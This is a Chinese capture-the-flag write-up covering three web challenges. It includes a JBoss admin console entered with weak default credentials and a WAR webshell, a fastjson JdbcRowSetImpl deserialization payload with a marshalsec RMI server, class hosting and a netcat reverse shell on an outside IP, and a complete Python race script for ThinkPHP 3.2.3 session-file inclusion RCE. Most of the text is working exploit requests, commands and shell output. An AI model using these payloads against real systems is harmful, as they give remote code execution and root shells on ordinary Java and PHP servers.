一个JBOSS的环境,查了一下,发现了JBoss6.x Administration Console 弱口令getshell这个可以打。
用弱密钥admin,admin登录admin console,然后点击web application (war)s,上传一个war包:
然后getshell即可:
http://5111690b.yunyansec.com/shell/1.jsp?pwd=feng&cmd=cat /flag
进入网页显示:
{
"name":"from zero to one"
}尝试post穿json格式的name,发现内容成功回显,但是试了试不是SSTI。但是又尝试了报错:
很明显的SpringBoot的error页面了。既然是Java的Json,大概率得是fastjson了,直接打就打通了,具体可以上网上查fastjson的攻击方式即可:
POST / HTTP/1.1
Host: 14ac75ae.yunyansec.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 265
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://118.31.168.198:39654/Exploit",
"autoCommit":true
}
}root@iZbp14tgce8absspjkxi3iZ:~/ctf/fastjson# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://118.31.168.198:39343/#Exploit" 39654
* Opening JRMP listener on 39654
Have connection from /113.201.14.253:59676
Reading message...
Is RMI.lookup call for Exploit 2
Sending remote classloading stub targeting http://118.31.168.198:39343/Exploit.class
Closing connection
root@iZbp14tgce8absspjkxi3iZ:~/ctf/fastjson# python3 -m http.server 39343
Serving HTTP on 0.0.0.0 port 39343 (http://0.0.0.0:39343/) ...
113.201.14.253 - - [25/Sep/2021 14:15:36] "GET /Exploit.class HTTP/1.1" 200 -root@iZbp14tgce8absspjkxi3iZ:~# nc -lvvp 39655
Listening on [0.0.0.0] (family 0, port 39655)
Connection from [113.201.14.253] port 39655 [tcp/*] accepted (family 2, sport 59160)
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@652ebb7c22f5:/# ls
ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
root@652ebb7c22f5:/# cat /flag
cat /flag
flag{22081ab1ee9d923e70d1f88d4892ecb1}
root@652ebb7c22f5:/#www.zip有源码泄露,?s=1知道是thinkphp3.2.3:
<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
public function index($doge=''){
if(preg_grep('/flag|Home|Common\/21/i',$doge)){
die("<dialog open>Get Out Hacker!</dialog>");
}else{
$this->assign($doge);
$this->display();
}
}
}佛了。。。长安杯真就复现杯。。。复现一下tp3.2.3的那个模板渲染的rce。ban了一些东西,利用session文件包含即可:
import io
import sys
import requests
import threading
host = 'http://a297c63a.yunyansec.com/'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'
def POST(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
host,
data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php echo md5('1');echo file_get_contents('flag.php');?>"},
files={"file":('a.txt', f)},
cookies={'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.get(f'{host}?doge[_filename]=/tmp/sess_{sessid}')
# print(response.text)
if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
print('[+++]retry')
#print(response.text)
else:
print(response.text)
sys.exit(0)
with requests.session() as session:
t1 = threading.Thread(target=POST, args=(session, ))
t1.daemon = True
t1.start()
READ(session)同上那个JBOSS...